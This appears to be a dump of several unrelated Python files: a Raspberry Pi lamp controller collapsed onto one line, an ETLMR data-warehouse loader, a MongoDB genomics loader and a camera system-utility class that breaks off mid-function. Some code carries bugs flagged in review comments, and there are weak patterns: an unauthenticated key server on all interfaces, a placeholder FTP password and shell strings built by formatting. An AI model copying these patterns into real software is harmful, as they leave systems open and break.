import subprocess import threading from time import sleep from threading import Thread import RPi.GPIO as GPIO import constants import firebase #from Subfact_ina219 import INA219 GPIO.setwarnings(False) GPIO.setmode(GPIO.BOARD) GPIO.setup(38, GPIO.OUT) GPIO.setup(40, GPIO.OUT) state=1 vcc=1 firebase = firebase.FirebaseApplication('https://ecolamp-c8fda.firebaseio.com/', None) _on=True _run=False _bat=False #ina = INA219() def get_firebase(): global state global vcc sleep(1) while _on: result = firebase.get('/Lamp', None) state=result['state'] vcc = result['vcc'] #38 PIN - SVET #40 PIN - VCC #print state #print vcc ''' def Auto_energy(): global _bat while _bat: print ("Bus : %.3f V" % ina.getBusVoltage_V()) print ("Current : %.3f mA" % ina.getCurrent_mA()) print ("WATT : %.3f mW" % ina.getPower_mW()) if ina.getBusVoltage_V()<=11.8:#220V GPIO.output(40,GPIO.LOW) elif ina.getBusVoltage_V()>12.5 : #12V GPIO.output(40,GPIO.HIGH) #REL'e FOR NOT COLLECTING ENERGY FROM SOLAR PANEL sleep(30) ''' def running(): global _run global GPIO global threadA global state global _bat global vcc sleep(0.5) while True: print(state) print(vcc) if state==0: print("AUTO MODE ON") _run=True else: _run=False print ("AUTO MODE OFF") if state==1: print ('Lights On') GPIO.output(38,GPIO.LOW)# na 40 HIGH #GPIO.output(40,GPIO.LOW) if state==2: print ('Lights Off') GPIO.output(38,GPIO.HIGH) # na 40 LOW if vcc==1: print ('always 220v') GPIO.output(40,GPIO.LOW) if vcc==0: print ('battery check mode') _bat=True ''' if not threadA.isAlive(): threadA = Thread(target = Auto_energy) threadA.start() GPIO.output(38,GPIO.LOW) GPIO.output(40,GPIO.HIGH) ''' sleep(2) #threadA = Thread(target = Auto_energy) threadB = Thread(target = running) threadD = Thread(target = get_firebase) threadB.setDaemon = True threadD.setDaemon = True threadB.start() threadD.start()
paralleletl.py
'''
 Usage: python etlmr.py [options] input_paths

 ETLMR driver (Python 2 / Disco): loads dimension and fact data into a data
 warehouse via Disco MapReduce jobs, with an optional TCP sequence server
 that hands out surrogate keys for online ODOT loading.
'''
#
# Copyright (c) 2011 Xiufeng Liu (xiliu@cs.aau.dk)
#
# This file is free software: you may copy, redistribute and/or modify it
# under the terms of the GNU General Public License version 2
# as published by the Free Software Foundation.
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
import os, getopt, sys, time, socket, multiprocessing
from thread import *
from optparse import OptionParser
from os import getenv
import pyetlmr
from conf import config
from disco.core import Disco, Params, result_iterator
import offdimetlmr, odotetlmr, odatetlmr
from postfix import post_fix

__author__ = "Xiufeng Liu"
__maintainer__ = "Xiufeng Liu"
__version__ = '0.1.0'


def seq_init():
    # Seed the surrogate-key sequence map from the current MAX(key) of every
    # dimension table (snowflaked dimensions contribute each member table).
    conn = config.connection
    dims = set()
    seq = {}
    for dimension in config.dimensions:
        if type(dimension) == pyetlmr.odattables.SnowflakedDimension:
            dims.update(dimension.sfdims)
        else:
            dims.add(dimension)
    for dim in dims:
        conn.execute("SELECT MAX(%(key)s) FROM %(name)s" %\
                     {'key': dim.key, 'name': dim.name})
        maxid = conn.fetchonetuple()[0]
        if maxid:
            seq[dim.name] = maxid
    return seq


def client_thread(conn, seq):
    # Serve one client: each received dimension name yields the next id.
    # NOTE(review): the 'END'/'' sentinel still increments seq before the
    # break, so a bogus 'END' key accumulates in the map — confirm intended.
    while True:
        data = conn.recv(1024)
        nextid = seq.get(data, 1);  seq[data] = nextid + 1
        if data == 'END' or data == '':
            break
        conn.sendall(str(nextid))
    conn.close()


def seq_server():
    # Simple TCP server handing out surrogate keys; one thread per client.
    # NOTE(review): s.close() after 'while True' is unreachable; the server
    # only dies when its hosting process is terminated.
    HOST = ''   # bind all interfaces
    PORT = 8888
    MAX_CON_NUM = 20
    seq = seq_init()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind((HOST, PORT))
    except socket.error , msg:
        print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
        sys.exit()
    s.listen(MAX_CON_NUM)
    while True:
        conn, addr = s.accept()
        start_new_thread(client_thread ,(conn, seq))
    s.close()


def load_dim(master, input, config_path, nr_maps=1, \
             nr_reduces=1, load_method=offdimetlmr, \
             post_fixing=-1, go_live=1, profile=False):
    # Load all dimensions, honouring config.order when present (groups of
    # dimensions loaded in sequence); optionally run ODAT post-fixing after.
    try:
        order = config.order
    except Exception:
        order = [config.dimensions.keys()]
    dim_starttime = time.time()
    for dims in order:
        dimnames = repr([dim.name for dim in dims])
        print "Loading %s ..." % str(dimnames)
        load_one_dim(master, input, config_path, nr_maps,\
                     nr_reduces, load_method, dimnames, go_live, profile)
    dim_endtime = time.time()
    print "Time of loading dimensions: %f seconds" % (dim_endtime-dim_starttime)
    if post_fixing == 1:
        post_fix(config)


def load_one_dim(master, input, config_path, nr_maps=1, nr_reduces=1,\
                 load_method=offdimetlmr, dimnames= repr([]), \
                 go_live=1, profile=False):
    # Submit one Disco dimension-loading job and, for offline loading,
    # optionally copy ("go live") the produced shelve DBs into the DW DBMS.
    dim_job = master.new_job(
        name = 'dim',
        input = input,
        map_init = load_method.dim_map_init,
        map_reader = load_method.map_reader,
        map = load_method.dim_map_func,
        partition = load_method.dim_partition_func,
        combiner = load_method.dim_combiner_func,
        reduce = load_method.dim_reduce_func,
        scheduler = {'max_cores': nr_maps},
        nr_reduces = nr_reduces,
        required_modules=[('config', config_path)],
        profile = profile,
        status_interval = 1000000,
        params = Params(count=0, dimnames=dimnames, \
                        nr_maps=nr_maps, nr_reduces=nr_reduces)
    )
    results = dim_job.wait()
    shelvedb_paths = []
    if results != None:
        for key, value in result_iterator(results):
            shelvedb_paths.append(key)
        if go_live == 1:
            load_method.golive(config, shelvedb_paths)
    #results = dim_job.wait(show=True, poll_interval = 100, timeout = 10*3600)
    #dim_job.purge()


def load_fact(master, input, config_path, nr_maps=1, nr_reduces=1, \
              load_method=offdimetlmr, profile=False):
    # Submit the Disco fact-loading job (map + combiner only) and time it.
    #disco = Disco("disco://"+host)
    fact_starttime = time.time()
    fact_job = master.new_job(
        name = 'fact',
        input = input,
        map_init = load_method.fact_map_init,
        map_reader = load_method.map_reader,
        map = load_method.fact_map_func,
        combiner = load_method.fact_combiner_func,
        scheduler = {'max_cores': nr_maps},
        nr_reduces = nr_reduces,
        required_modules=[('config', config_path),],
        status_interval = 1000000,
        profile = profile,
        params = Params(totalcopytime=0, nr_maps=nr_maps, \
                        nr_reduces=nr_reduces)
    )
    results = fact_job.wait()
    #results = fact_job.wait(show=True, poll_interval = 100, timeout = 10*3600)
    fact_endtime = time.time()
    print "Time of loading facts: %f seconds" % (fact_endtime-fact_starttime)
    #fact_job.purge()


if __name__== "__main__":
    # CLI driver: parse options, build dfs:// input URLs from the given input
    # directories, then run either the dimension step (1) or the fact step (2).
    disco_home = os.environ["DISCO_HOME"]
    parser = OptionParser(usage='%etlmr [options] input_paths')
    parser.add_option('--disco-master', default=getenv('DISCO_MASTER'),
                      help='Disco master')
    parser.add_option('--nr-maps', default=2,
                      help='Numbers of mappers (default=1)')
    parser.add_option('--nr-reducers', default=2,
                      help='Numbers of reducers (default=1)')
    parser.add_option('--load-step', default=1,
                      help='Loading step (default=1): 1. Load dimensions; \
                      2. Load facts')
    parser.add_option('--load-method', default=1,
                      help='Loading method of dimensions (default=1): 1. Online ODOT; \
                      2. Online ODAT; 3. Offline dim')
    parser.add_option('--post-fix', default=1,
                      help='Does post-fixing for ODAT? (default=1): 1. Yes; 2. No')
    parser.add_option('--go-live', default=1,
                      help='Load offline dim data to DW DBMS? (default=1): 1. yes; 2. No')
    parser.add_option('--profile', default=False,
                      help='Profile (default=False)')
    parser.add_option('--config', default='conf/config.py',
                      help='The path to config.py (default=conf/config.py)')
    (options, input_paths) = parser.parse_args()

    master = Disco("disco://"+options.disco_master)
    load_method = odotetlmr
    seq_process = None
    post_fixing = -1
    load_step = int(options.load_step)
    if options.load_method == '2':
        load_method = odatetlmr
        if load_step == 1:
            post_fixing = int(options.post_fix)
            # ODAT online loading needs the surrogate-key sequence server.
            seq_process = multiprocessing.Process(target=seq_server)
            seq_process.start()
    elif options.load_method == '3':
        load_method = offdimetlmr

    input_file_urls = []
    for input_path in input_paths:
        input_files = [f for f in os.listdir(input_path) if \
                       os.path.isfile(os.path.join(input_path, f))]
        # Map local paths under $DISCO_HOME/root/input to dfs:// URLs.
        prefix = input_path.partition(os.path.join(disco_home, 'root', 'input'))[2]
        input_file_urls.extend(['dfs://%s%s' % (options.disco_master, \
                                                os.path.join(prefix, f)) \
                                for f in input_files])
    print "input_file_urls=%s" % str(input_file_urls)

    if load_step == 1:
        load_dim(master, input_file_urls, config_path=options.config,\
                 nr_maps=int(options.nr_maps), nr_reduces=int(options.nr_reducers), load_method=load_method, \
                 post_fixing=post_fixing, go_live=int(options.go_live), profile=options.profile)
        if seq_process:
            seq_process.terminate()
    elif load_step == 2:
        load_fact(master, input_file_urls, config_path=options.config, \
                  nr_maps=int(options.nr_maps), nr_reduces=int(options.nr_reducers),load_method=load_method,\
                  profile=options.profile)
    else:
        parser.print_help()
__init__.py
### all the mongodb reading/writing code lives here now
# NOTE(review): this section is Python 2 (print statements, raw_input,
# `except X, e` syntax) and uses legacy PyMongo APIs (insert/ensure_index).


def load_db():
    """
    Load the database

    Drops and rebuilds every collection. Runs the loaders that support
    parallelism as child processes, waits for all of them, then performs the
    serial post-steps (MNPs, cache).
    """
    # Initialize database
    # Don't need to explicitly create tables with mongo, just indices
    confirm = raw_input('This will drop the database and reload. Are you sure you want to continue? [no] ')
    if not confirm.startswith('y'):
        print('Exiting...')
        sys.exit(1)
    all_procs = []
    # Each loader drops its collection, spawns worker Processes and returns
    # them immediately; they all run concurrently and are joined below.
    for load_function in [load_variants_file, load_dbsnp_file, load_base_coverage, load_gene_models, load_constraint_information]:
        procs = load_function()
        all_procs.extend(procs)
        print("Started %s processes to run %s" % (len(procs), load_function.__name__))

    # side-effect comprehension: block until every worker process finishes
    [p.join() for p in all_procs]
    print('Done! Loading MNPs...')
    load_mnps()
    print('Done! Creating cache...')
    create_cache()
    print('Done!')


def load_base_coverage():
    """
    Drop and reload db.base_coverage from BASE_COVERAGE_FILES.

    :return: list of started multiprocessing.Process workers (caller joins them)
    """
    def load_coverage(coverage_files, i, n, db):
        # worker i of n: stream its subset of the tabix files into mongo
        coverage_generator = parse_tabix_file_subset(coverage_files, i, n, get_base_coverage_from_file)
        try:
            db.base_coverage.insert(coverage_generator, w=0)
        except pymongo.errors.InvalidOperation, e:
            print(e)
            # handle error when coverage_generator is empty
            pass

    db = get_db()
    db.base_coverage.drop()
    print("Dropped db.base_coverage")
    # load coverage first; variant info will depend on coverage
    db.base_coverage.ensure_index('xpos')

    procs = []
    coverage_files = app.config['BASE_COVERAGE_FILES']
    num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
    # shuffles the same list object `coverage_files` refers to, so workers see
    # the shuffled order
    random.shuffle(app.config['BASE_COVERAGE_FILES'])
    for i in range(num_procs):
        p = Process(target=load_coverage, args=(coverage_files, i, num_procs, db))
        p.start()
        procs.append(p)
    return procs
    #print 'Done loading coverage. Took %s seconds' % int(time.time() - start_time)


def load_variants_file():
    """
    Drop and reload db.variants from the sites VCFs.

    :return: list of started multiprocessing.Process workers (caller joins them)
    """
    def load_variants(sites_file, i, n, db):
        # worker i of n: each worker walks every VCF but only its subset of rows
        for f in sites_file:
            variants_generator = parse_tabix_file_subset([f], i, n, get_variants_from_sites_vcf)
            try:
                db.variants.insert(variants_generator, w=0)
            except pymongo.errors.InvalidOperation:
                pass  # handle error when variant_generator is empty

    db = get_db()
    db.variants.drop()
    print("Dropped db.variants")

    # grab variants from sites VCF
    db.variants.ensure_index('xpos')
    db.variants.ensure_index('xstart')
    db.variants.ensure_index('xstop')
    db.variants.ensure_index('rsid')
    db.variants.ensure_index('genes')
    db.variants.ensure_index('transcripts')

    sites_vcfs = app.config['SITES_VCFS']
    print(sites_vcfs)
    #if len(sites_vcfs) > 1: raise Exception("More than one sites vcf file found: %s" % sites_vcfs)

    procs = []
    num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
    #pdb.set_trace()
    for i in range(num_procs):
        p = Process(target=load_variants, args=(sites_vcfs, i, num_procs, db))
        p.start()
        procs.append(p)
    return procs

    #print 'Done loading variants. Took %s seconds' % int(time.time() - start_time)


def load_constraint_information():
    """
    Drop and reload db.constraint from the gzipped CONSTRAINT_FILE.

    Runs serially in this process; returns no worker processes.
    """
    db = get_db()
    db.constraint.drop()
    print 'Dropped db.constraint.'
    start_time = time.time()
    with gzip.open(app.config['CONSTRAINT_FILE']) as constraint_file:
        for transcript in get_constraint_information(constraint_file):
            db.constraint.insert(transcript, w=0)
    db.constraint.ensure_index('transcript')
    print 'Done loading constraint info. Took %s seconds' % int(time.time() - start_time)


def load_mnps():
    """
    Clear any previous MNP annotations from db.variants and re-apply them
    from MNP_FILE. Must run after the variants are loaded.
    """
    db = get_db()
    start_time = time.time()

    db.variants.ensure_index('has_mnp')
    print 'Done indexing.'
    # repeatedly strip has_mnp/mnps until no flagged document remains
    while db.variants.find_and_modify({'has_mnp' : True}, {'$unset': {'has_mnp': '', 'mnps': ''}}):
        pass
    print 'Deleted MNP data.'

    with gzip.open(app.config['MNP_FILE']) as mnp_file:
        for mnp in get_mnp_data(mnp_file):
            variant = lookups.get_raw_variant(db, mnp['xpos'], mnp['ref'], mnp['alt'], True)
            db.variants.find_and_modify({'_id': variant['_id']}, {'$set': {'has_mnp': True}, '$push': {'mnps': mnp}}, w=0)

    db.variants.ensure_index('has_mnp')
    print 'Done loading MNP info. Took %s seconds' % int(time.time() - start_time)


def load_gene_models():
    """
    Drop and reload db.genes, db.transcripts and db.exons from the GENCODE
    GTF, annotating genes with canonical transcript, OMIM and dbNSFP info.

    :return: empty list (runs serially; interface matches the parallel loaders)
    """
    db = get_db()

    db.genes.drop()
    db.transcripts.drop()
    db.exons.drop()
    print 'Dropped db.genes, db.transcripts, and db.exons.'

    start_time = time.time()

    canonical_transcripts = {}
    with gzip.open(app.config['CANONICAL_TRANSCRIPT_FILE']) as canonical_transcript_file:
        for gene, transcript in get_canonical_transcripts(canonical_transcript_file):
            canonical_transcripts[gene] = transcript

    omim_annotations = {}
    with gzip.open(app.config['OMIM_FILE']) as omim_file:
        for fields in get_omim_associations(omim_file):
            if fields is None:
                continue
            gene, transcript, accession, description = fields
            omim_annotations[gene] = (accession, description)

    dbnsfp_info = {}
    with gzip.open(app.config['DBNSFP_FILE']) as dbnsfp_file:
        for dbnsfp_gene in get_dbnsfp_info(dbnsfp_file):
            other_names = [other_name.upper() for other_name in dbnsfp_gene['gene_other_names']]
            dbnsfp_info[dbnsfp_gene['ensembl_gene']] = (dbnsfp_gene['gene_full_name'], other_names)

    print 'Done loading metadata. Took %s seconds' % int(time.time() - start_time)

    # grab genes from GTF
    start_time = time.time()
    with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
        for gene in get_genes_from_gencode_gtf(gtf_file):
            gene_id = gene['gene_id']
            if gene_id in canonical_transcripts:
                gene['canonical_transcript'] = canonical_transcripts[gene_id]
            if gene_id in omim_annotations:
                gene['omim_accession'] = omim_annotations[gene_id][0]
                gene['omim_description'] = omim_annotations[gene_id][1]
            if gene_id in dbnsfp_info:
                gene['full_gene_name'] = dbnsfp_info[gene_id][0]
                gene['other_names'] = dbnsfp_info[gene_id][1]
            db.genes.insert(gene, w=0)

    print 'Done loading genes. Took %s seconds' % int(time.time() - start_time)

    start_time = time.time()
    db.genes.ensure_index('gene_id')
    db.genes.ensure_index('gene_name_upper')
    db.genes.ensure_index('gene_name')
    db.genes.ensure_index('other_names')
    db.genes.ensure_index('xstart')
    db.genes.ensure_index('xstop')
    print 'Done indexing gene table. Took %s seconds' % int(time.time() - start_time)

    # and now transcripts
    start_time = time.time()
    with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
        db.transcripts.insert((transcript for transcript in get_transcripts_from_gencode_gtf(gtf_file)), w=0)
    print 'Done loading transcripts. Took %s seconds' % int(time.time() - start_time)

    start_time = time.time()
    db.transcripts.ensure_index('transcript_id')
    db.transcripts.ensure_index('gene_id')
    print 'Done indexing transcript table. Took %s seconds' % int(time.time() - start_time)

    # Building up gene definitions
    start_time = time.time()
    with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
        db.exons.insert((exon for exon in get_exons_from_gencode_gtf(gtf_file)), w=0)
    print 'Done loading exons. Took %s seconds' % int(time.time() - start_time)

    start_time = time.time()
    db.exons.ensure_index('exon_id')
    db.exons.ensure_index('transcript_id')
    db.exons.ensure_index('gene_id')
    print 'Done indexing exon table. Took %s seconds' % int(time.time() - start_time)

    return []


def load_dbsnp_file():
    """
    Drop and reload db.dbsnp from DBSNP_FILE.

    Uses multiple worker processes when a tabix index (.tbi) is present,
    otherwise a single process reading the plain .gz file.

    :return: list of started multiprocessing.Process workers (caller joins them)
    """
    db = get_db()

    def load_dbsnp(dbsnp_file, i, n, db):
        # worker i of n; with no .tbi index only one worker is started and it
        # streams the whole gzip file
        if os.path.isfile(dbsnp_file + ".tbi"):
            dbsnp_record_generator = parse_tabix_file_subset([dbsnp_file], i, n, get_snp_from_dbsnp_file)
            try:
                db.dbsnp.insert(dbsnp_record_generator, w=0)
            except pymongo.errors.InvalidOperation:
                pass  # handle error when coverage_generator is empty
        else:
            with gzip.open(dbsnp_file) as f:
                db.dbsnp.insert((snp for snp in get_snp_from_dbsnp_file(f)), w=0)

    db.dbsnp.drop()
    db.dbsnp.ensure_index('rsid')
    db.dbsnp.ensure_index('xpos')
    start_time = time.time()
    dbsnp_file = app.config['DBSNP_FILE']

    print "Loading dbsnp from %s" % dbsnp_file
    if os.path.isfile(dbsnp_file + ".tbi"):
        num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
    else:
        # see if non-tabixed .gz version exists
        if os.path.isfile(dbsnp_file):
            print(("WARNING: %(dbsnp_file)s.tbi index file not found. Will use single thread to load dbsnp."
                   "To create a tabix-indexed dbsnp file based on UCSC dbsnp, do: \n"
                   "   wget http://hgdownload.soe.ucsc.edu/goldenPath/hg19/database/snp141.txt.gz \n"
                   "   gzcat snp141.txt.gz | cut -f 1-5 | bgzip -c > snp141.txt.bgz \n"
                   "   tabix -0 -s 2 -b 3 -e 4 snp141.txt.bgz") % locals())
            num_procs = 1
        else:
            # NOTE(review): "%s(dbsnp_file)s" is a malformed placeholder — with
            # `% locals()` it renders the whole locals() dict instead of the
            # file name; should be "%(dbsnp_file)s".
            raise Exception("dbsnp file %s(dbsnp_file)s not found." % locals())

    procs = []
    for i in range(num_procs):
        p = Process(target=load_dbsnp, args=(dbsnp_file, i, num_procs, db))
        p.start()
        procs.append(p)
    return procs

    #print 'Done loading dbSNP. Took %s seconds' % int(time.time() - start_time)

    #start_time = time.time()
    #db.dbsnp.ensure_index('rsid')
    #print 'Done indexing dbSNP table. Took %s seconds' % int(time.time() - start_time)
SysUtil.py
import subprocess
import random, string, os, socket, json, time
from glob import glob
from urllib import request
import threading
import configparser
import yaml
import logging
import logging.config
import fcntl
import datetime

# ioctl request number for a USB port reset (USBDEVFS_RESET from
# linux/usbdevice_fs.h)
USBDEVFS_RESET = 21780

# best-effort logging setup; missing/broken logging.ini is silently ignored
try:
    logging.config.fileConfig("logging.ini")
except:
    pass


def sizeof_fmt(num, suffix='B'):
    """Format a byte count as a human-readable IEC string, e.g. 1234 -> '1.2KiB'."""
    for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
        if abs(num) < 1024.0:
            return "%3.1f%s%s" % (num, unit, suffix)
        num /= 1024.0
    return "%.1f%s%s" % (num, 'Yi', suffix)


# template written out for cameras that have no config file yet
default_config = """
[DEFAULT]
exposure = 0
enabled = on
resize = on

[camera]
name =
enabled = on

[ftp]
enabled = on
replace = on
resize = on
timestamped = on
server = sftp.traitcapture.org
directory = /
username = picam
password = DEFAULT_PASSWORD

[timelapse]
interval = 300
starttime = 00:00
stoptime = 23:59

[localfiles]
spooling_dir =
upload_dir =
"""

# template written out for lights that have no config file yet
default_light_config = """
[light]
max_power = 1000
min_power = 0
wavelengths = "400nm,420nm,450nm,530nm,630nm,660nm,735nm"
csv_keys = "LED1,LED2,LED3,LED4,LED5,LED6,LED7"
file_path = "lights_byserial/{identifier}.scf"

[telnet]
telnet_host = "192.168.2.124"
telnet_port = 50630
set_all_command = setall {power}
set_wavelength_command = setwlrelpower {wavelength} {power}
set_all_wavelength_command = setwlsrelpower {} {} {} {} {} {} {}
get_wavelength_command = getwlrelpower {wavelength}

[url]
url_host = "192.168.2.124"
control_uri = /cgi-bin/userI.cgi
set_all_command = "setAllTo": {percent}, "setAllSub": "set"
set_all_wavelength_command = "wl1":{}, "wl2":{}, "wl3":{}, "wl4":{}, "wl5":{}, "wl6":{}, "wl7":{}
"""


class SysUtil(object):
    """
    System utility class.
    Helper class to cache various things like the hostname, machine-id, amount of space in the filesystem.
    """
    # class-level caches: each is a (value, unix_timestamp_of_last_refresh)
    # pair; the getters refresh when the timestamp is stale
    _ip_address = "0.0.0.0", 0
    _external_ip = "0.0.0.0", 0
    _machine_id = "", 0
    _hostname = "HOSTNAME", 0
    _tor_host = ("unknown.onion", "not a real key", "not a real client"), 0
    _version = "Unknown spc-eyepi version", 0
    # NOTE: os.statvfs("/") runs at import time; import fails on systems
    # without a readable root filesystem.
    a_statvfs = os.statvfs("/")
    _fs = (a_statvfs.f_frsize * a_statvfs.f_bavail, a_statvfs.f_frsize * a_statvfs.f_blocks), 0
    # list of (path, mtime, callback) tuples serviced by the watcher thread
    _watches = list()
    thread = None
    stop = False
    logger = logging.getLogger("SysUtil")

    def __init__(self):
        # first instantiation starts the single shared watcher thread;
        # subsequent instantiations are no-ops
        if SysUtil.thread is None:
            SysUtil.thread = threading.Thread(target=self._thread)
            SysUtil.thread.start()
        pass

    @staticmethod
    def reset_usb_device(bus: int, dev: int) -> bool:
        """
        resets a usb device.

        :param bus: bus number
        :type bus: int
        :param dev: device number of the device on the bus above
        :type dev: int
        """
        try:
            fn = "/dev/bus/usb/{bus:03d}/{dev:03d}".format(bus=bus, dev=dev)
            # NOTE(review): the third positional argument of open() is
            # `buffering`, not open flags — os.O_WRONLY (==1) here means
            # "line buffered", which happens to work but is not the intent.
            with open(fn, 'w', os.O_WRONLY) as f:
                fcntl.ioctl(f, USBDEVFS_RESET, 0)
            return True
        except Exception as e:
            # NOTE(review): falls through returning None (not False) on error
            SysUtil.logger.error("Couldnt reset usb device (possible filenotfound): {}".format(str(e)))

    @staticmethod
    def default_identifier(prefix=None):
        """
        returns an identifier, If no prefix available, generates something.

        :param prefix:
        :return: string of the itentifier.
        :rtype: str
        """
        if prefix:
            return SysUtil.get_identifier_from_name(prefix)
        else:
            from hashlib import md5
            # NOTE(review): this branch only runs when prefix is falsy, yet
            # bytes(prefix, 'utf-8') needs a str — bytes(None, 'utf-8') raises
            # TypeError, so the "autogenerated" path cannot work as written.
            serialnumber = ("AUTO_" + md5(bytes(prefix, 'utf-8')).hexdigest()[len("AUTO_"):])[:32]
            SysUtil.logger.warning("using autogenerated serialnumber {}".format(serialnumber))
            return serialnumber

    @staticmethod
    def _nested_lookup(key, document):
        """
        nested document lookup,
        works on dicts and lists

        :param key: string of key to lookup
        :param document: dict or list to lookup
        :return: yields item
        """
        if isinstance(document, list):
            for d in document:
                for result in SysUtil._nested_lookup(key, d):
                    yield result

        if isinstance(document, dict):
            for k, v in document.items():
                if k == key:
                    yield v
                elif isinstance(v, dict):
                    for result in SysUtil._nested_lookup(key, v):
                        yield result
                elif isinstance(v, list):
                    for d in v:
                        for result in SysUtil._nested_lookup(key, d):
                            yield result

    @staticmethod
    def sizeof_fmt(num, suffix='B')->str:
        """
        formats a number of bytes in to a human readable string.
        returns in SI units eg sizeof_fmt(1234) returns '1.2KiB'

        :param num: number of bytes to format
        :param suffix: the suffix to use
        :return: human formattted string.
        :rtype: str
        """
        for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
            if abs(num) < 1024.0:
                return "%3.1f%s%s" % (num, unit, suffix)
            num /= 1024.0
        return "%.1f%s%s" % (num, 'Yi', suffix)

    @classmethod
    def update_from_git(cls):
        """
        updates spc-eyepi from git.
        """
        # hard reset to origin/master, then restart the capture service
        os.system("git fetch --all;git reset --hard origin/master")
        os.system("systemctl restart spc-eyepi_capture.service")

    @classmethod
    def get_hostname(cls)->str:
        """
        gets the current hostname.
        if there is no /etc/hostname file, sets the hostname randomly.

        :return: the current hostname or the hostname it was set to
        :rtype: str
        """
        # cached for 10 seconds
        if abs(cls._hostname[-1] - time.time()) > 10:
            if not os.path.isfile("/etc/hostname"):
                hostname = "".join(random.choice(string.ascii_letters) for _ in range(8))
                # NOTE(review): bug — formats the cached (value, timestamp)
                # tuple `cls._hostname`, not the freshly generated `hostname`,
                # into the shell command.
                os.system("hostname {}".format(cls._hostname))
            else:
                with open("/etc/hostname", "r") as fn:
                    hostname = fn.read().strip()
            cls._hostname = hostname, time.time()

        return cls._hostname[0]

    @classmethod
    def set_hostname(cls, hostname: str):
        """
        sets the machines hosname, in /etc/hosts and /etc/hostname

        :param hostname: the string of which to set the hostname to.
        """
        try:
            with open(os.path.join("/etc/", "hostname"), 'w') as f:
                f.write(hostname + "\n")
            # rewrites /etc/hosts entirely with localhost entries for the
            # new hostname (any other entries are lost)
            with open(os.path.join("/etc/", "hosts"), 'w') as hosts_file:
                h_tmpl = "127.0.0.1\tlocalhost.localdomain localhost {hostname}\n"
                h_tmpl += "::1\tlocalhost.localdomain localhost {hostname}\n"
                hosts_file.write(h_tmpl.format(hostname=hostname))
        except Exception as e:
            cls.logger.error("Failed setting hostname for machine. {}".format(str(e)))

    @classmethod
    def get_machineid(cls)->str:
        """
        gets the machine id, or initialises the machine id if it doesnt exist.

        :return: string of the machine-id
        :rtype: str
        """
        # cached for 10 seconds
        if abs(cls._machine_id[-1] - time.time()) > 10:
            if not os.path.isfile("/etc/machine-id"):
                # create /etc/machine-id on systems that lack one
                os.system("systemd-machine-id-setup")
            with open("/etc/machine-id") as f:
                cls._machine_id = f.read().strip(), time.time()
        return cls._machine_id[0]

    @classmethod
    def get_tor_host(cls)->tuple:
        """
        gets a tuple of the current tor host.

        :return: tuple of hostname(onion address), client key, client name
        :rtype: tuple[str, str, str]
        """
        # cached for 10 seconds
        if abs(cls._tor_host[-1] - time.time()) > 10:
            try:
                with open("/home/tor_private/hostname") as f:
                    onion_address = f.read().replace('\n', '')
                cls._tor_host = onion_address.split(" ")[:3], time.time()
            except:
                cls._tor_host = ("unknown", 'unknown', "unknown"), time.time()
        return cls._tor_host[0]

    @classmethod
    def get_fs_space(cls)->tuple:
        """
        returns free/total space of root filesystem as bytes(?)

        :return: tuple of free/total space
        :rtype: tuple[int, int]
        """
        # cached for 10 seconds
        if abs(cls._fs[-1] - time.time()) > 10:
            try:
                a_statvfs = os.statvfs("/")
                cls._fs = (
                    a_statvfs.f_frsize * a_statvfs.f_bavail, a_statvfs.f_frsize * a_statvfs.f_blocks), time.time()
            except:
                cls._fs = (0, 0), time.time()
        return cls._fs[0]

    @classmethod
    def get_fs_space_mb(cls)->tuple:
        """
        returns the filesystems free space in mebibytes.
        see :func:`get_fs_space`

        :return: tuple of free/total space
        :rtype:tuple[int, int]
        """
        free_space, total_space = SysUtil.get_fs_space()
        # divide twice by 1024: bytes -> KiB -> MiB
        for x in range(0, 2):
            free_space /= 1024.0
            total_space /= 1024.0
        return free_space, total_space

    @classmethod
    def get_version(cls)->str:
        """
        gets the "describe" version of the current git repo as a string.

        :return: the current version
        :rtype: str
        """
        # cached for 10 seconds
        if abs(cls._version[-1] - time.time()) > 10:
            try:
                cmd = "/usr/bin/git describe --always"
                cls._version = subprocess.check_output([cmd], shell=True).decode().strip("\n"), time.time()
            except:
                cls._version = "unknown", time.time()
        return cls._version[0]

    @classmethod
    def get_internal_ip(cls):
        """
        gets the internal ip by attempting to connect to googles DNS

        :return: the current internal ip
        :rtype: str
        """
        # cached for 10 seconds; prefers the tun0 (VPN) address when the
        # optional netifaces package is available
        if abs(cls._ip_address[-1] - time.time()) > 10:
            try:
                try:
                    import netifaces
                    ip = netifaces.ifaddresses("tun0")[netifaces.AF_INET][0]["addr"]
                    cls._ip_address = ip, time.time()
                except:
                    import socket
                    # UDP "connect" does no traffic; it just picks the
                    # outgoing interface whose address we then read
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    s.connect(("8.8.8.8", 0))
                    cls._ip_address = s.getsockname()[0], time.time()
            except:
                cls._ip_address = "0.0.0.0", time.time()
        return cls._ip_address[0]

    @classmethod
    def get_log_files(cls) -> list:
        """
        returns the spc-eyepi log files that have been rotated.

        :return: list of filenames
        :rtype: list(str)
        """
        return list(glob("/home/spc-eyepi/spc-eyepi.log.*"))

    @classmethod
    def clear_files(cls, filenames: list):
        """
        removes all files in the list provided, skipping and logging on an error removing
        todo: Do different things based on whether is a directory.

        :param filenames: list of directories or files
        :type filenames: list or tuple
        """
        for f in filenames:
            try:
                os.remove(f)
            except FileNotFoundError as e:
                cls.logger.debug(str(e))
            except IsADirectoryError as e:
                cls.logger.error(str(e))
            except Exception as e:
                cls.logger.error(str(e))

    @classmethod
    def get_isonow(cls):
        """
        gets the current time as an iso8601 string

        :return: the current time as iso8601
        :rtype: str
        """
        # NOTE(review): naive local time, no timezone attached
